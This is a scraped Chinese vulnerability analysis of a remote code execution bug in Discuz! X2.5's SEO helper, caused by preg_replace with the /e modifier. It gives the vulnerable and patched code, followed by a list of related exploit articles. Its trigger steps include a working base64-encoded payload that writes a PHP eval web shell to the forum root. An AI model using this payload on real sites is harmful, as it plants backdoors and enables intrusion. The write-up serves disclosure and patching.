Discuz! X2.5 /source/class/helper/helper_seo.php Remote Code Execution Vul
2015-05-24 10:27
381 查看
catalog
1. 漏洞描述
SEO模块中的preg_replace+修正符e+双引号引发的远程代码执行漏洞
[b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b]
2. 漏洞触发条件
[b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b]
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
SEO模块中的preg_replace+修正符e+双引号引发的远程代码执行漏洞
[b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b]
http://www.wooyun.org/bugs/wooyun-2012-06420
2. 漏洞触发条件
1. 后台设置,打开SEO扩展 2. 注册任意账户 3. 登陆用户,发表blog日志(注意是日志) 4. 添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 5. 访问日志,论坛根目录下生成demo.php,一句发密码c
[b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b]
http://weibo.com/2242334800/ygxonqLF9?type=comment#_rnd1432431149028 http://sebug.net/vuldb/ssvid-60082[/code]
3. 漏洞影响范围
4. 漏洞代码分析
/source/class/helper/helper_seo.php.. if($searcharray && $replacearray) { $_G['trunsform_tmp'] = array(); /* 1. 用于替换的$content来自于用户输入的图片地址 2. preg_place替换后的内容使用了双引号包裹 3. preg_replace的搜索正则使用了"e"修饰符 导致PHP在完成替换后,会使用eval对替换后的内容进行一次执行,又因为: eval("${${}}")这种语法可以动态执行,最终导致黑客可以远程代码注入 */ $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1\\2\\3\\4", "</relatedlink>")', $content); $content = preg_replace($searcharray, $replacearray, $content, 1); $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content); } ..
[b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b]http://www.wooyun.org/upload/201204/2620001868555ef2f2153e9b615d32467724d943.jpg
5. 防御方法
/source/class/helper/helper_seo.php.. if($searcharray && $replacearray) { $_G['trunsform_tmp'] = array(); /* 修复后将双引号改为单引号,使动态语法${${}}失去执行能力 */ $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", "helper_seo::base64_transform('encode', '<relatedlink>', '\\1\\2\\3\\4', '</relatedlink>')", $content); /* */ $content = preg_replace($searcharray, $replacearray, $content, 1); $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content); } ..
6. 攻防思考
[b][b][b][b][b][b][b][b][b][b][b][b][b][b][b][b][b][b]Copyright (c) 2015 LittleHann All rights reserved[/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b]
相关文章推荐
- Discuz! x3.1 /utility/convert/index.php Code Execution Vul
- PHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit
- [漏洞分析] PHPMoAdmin Unauthorized Remote Code Execution漏洞源码分析
- WordPress Woopra plugin remote PHP arbitrary code execution exploit.
- dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB && /include/dedesql.class.php
- Apache / PHP 5.x Remote Code Execution Exploit
- Php Endangers - Remote Code Execution
- PHP Charts 1.0 Remote Code Execution
- MS06-040 Remote Code Execution Proof of Concept
- F5_Unauthenticated_rsync_access_to_Remote_Root_Code_Execution
- SAP Netweaver 'SAPHostControl' Service Remote Code Execution Vulnerability
- Decompiled .class file bytecode version:49.0(java5.0) load or open source file.
- JBoss Seam Framework remote code execution
- PHP Lex Engine Sourcecode Analysis(undone)
- phpMyAdmin3 remote code execute php版本 exploit
- IDEA查看源码时提示:Library source does not match the bytecode for class的问题分析
- PHPMailer Exploit Remote Code Exec CVE-2016-10033 Vuln
- Discuz X1.5 X2.5 X3 UC_KEY Getshell Write PHPCODE into config/config_ucenter.php Via /api/uc.php Vul
- libpng: Remote execution of arbitrary code